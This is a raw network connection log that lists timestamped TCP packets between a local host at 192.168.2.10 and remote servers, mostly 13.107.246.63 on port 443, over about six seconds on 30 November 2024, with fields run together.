                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.282910109 CET4436221413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.283585072 CET62214443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.283597946 CET4436221413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.685548067 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.686254025 CET62216443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.686269045 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.686714888 CET62216443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.686721087 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.693722010 CET4436221513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.697451115 CET4436221513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.697527885 CET62215443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.697562933 CET62215443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.697580099 CET4436221513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.697591066 CET62215443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.697597027 CET4436221513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.700670958 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.700711012 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.700793028 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.700927019 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.700939894 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.735929012 CET4436221413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.736310005 CET4436221413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.736371994 CET62214443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.736429930 CET62214443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.736450911 CET4436221413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.736462116 CET62214443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.736468077 CET4436221413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.739337921 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.739387035 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.739474058 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.739623070 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.739636898 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.869126081 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.872456074 CET62217443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.872483015 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.872919083 CET62217443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:54.872925043 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.133917093 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.138226986 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.138326883 CET62216443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.138397932 CET62216443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.138416052 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.138427019 CET62216443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.138432980 CET4436221613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.141555071 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.141603947 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.141684055 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.141838074 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.141850948 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.313880920 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.317584991 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.317713976 CET62217443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.317759991 CET62217443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.317780018 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.317801952 CET62217443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.317807913 CET4436221713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.321315050 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.321365118 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.321465969 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.321667910 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.321681976 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.697295904 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.697988987 CET62218443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.698029041 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.698453903 CET62218443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:55.698460102 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.174760103 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178122997 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178191900 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178278923 CET62218443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178312063 CET62218443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178368092 CET62218443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178390026 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178395033 CET62218443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.178401947 CET4436221813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.181488037 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.181540966 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.181622982 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.181776047 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.181792021 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.482868910 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.483544111 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.483599901 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.484074116 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.484081030 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.589345932 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.590209961 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.590243101 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.590703011 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.590708017 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.978543997 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.981657028 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.981726885 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.981770992 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.981770992 CET62219443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.981792927 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.981803894 CET4436221913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.985217094 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.985244989 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.985302925 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.985460997 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.985471964 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.991950035 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.992342949 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.992361069 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.992801905 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:56.992805958 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.041850090 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.045828104 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.045880079 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.045898914 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.045958042 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.046047926 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.046066999 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.046077013 CET62220443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.046082973 CET4436222013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.049716949 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.049771070 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.049839020 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.050065041 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.050079107 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.107193947 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.107709885 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.107745886 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.108216047 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.108222008 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.444907904 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.448540926 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.448755026 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.448755026 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.448755026 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.451786041 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.451837063 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.451939106 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.452152014 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.452169895 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.551279068 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554598093 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554660082 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554665089 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554722071 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554769039 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554790974 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554796934 CET62222443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.554802895 CET4436222213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.557620049 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.557682991 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.557791948 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.557948112 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.557960987 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.749836922 CET62221443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:57.749902964 CET4436222113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.027117968 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.027836084 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.027878046 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.028320074 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.028330088 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.481163979 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.483684063 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.483747005 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.483861923 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.483881950 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.483900070 CET62223443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.483906031 CET4436222313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.486668110 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.486711979 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.486769915 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.486941099 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.486963034 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.765768051 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.766580105 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.766621113 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.766947985 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.766957045 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.832272053 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.833177090 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.833206892 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.833575010 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:58.833580017 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.209600925 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.212855101 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.212941885 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.213004112 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.213022947 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.213032961 CET62224443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.213041067 CET4436222413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.216073990 CET62229443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.216121912 CET4436222913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.216198921 CET62229443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.216332912 CET62229443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.216344118 CET4436222913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.273859978 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.274530888 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.274568081 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.275017977 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.275022984 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.277646065 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.280821085 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.280899048 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.281196117 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.281212091 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.281222105 CET62225443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.281228065 CET4436222513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.284126043 CET62230443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.284173965 CET4436223013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.284282923 CET62230443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.284449100 CET62230443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.284461021 CET4436223013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.297857046 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.298360109 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.298398018 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.298834085 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.298842907 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.707973957 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.711996078 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.712073088 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.712133884 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.712155104 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.712161064 CET62227443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.712167025 CET4436222713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.715459108 CET62231443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.715502024 CET4436223113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.715563059 CET62231443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.715713978 CET62231443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.715723991 CET4436223113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.750636101 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754491091 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754548073 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754693985 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754749060 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754770041 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754780054 CET62226443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.754786968 CET4436222613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.759109020 CET62232443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.759161949 CET4436223213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.759288073 CET62232443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.759454966 CET62232443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:59.759468079 CET4436223213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.269294024 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.269916058 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.269949913 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.270386934 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.270392895 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.713476896 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.713551998 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.713845015 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.713978052 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.713999033 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.714011908 CET62228443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.714018106 CET4436222813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.717369080 CET62233443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.717411041 CET4436223313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.717499018 CET62233443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.717686892 CET62233443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.717698097 CET4436223313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.748317957 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.748426914 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.748563051 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.867573023 CET4436223013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.868423939 CET62230443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.868448019 CET4436223013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.868798018 CET62230443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.868807077 CET4436223013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.969290972 CET4436222913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.972126007 CET62229443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.972153902 CET4436222913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:00.972593069 CET62229443192.168.2.1013.107.246.63
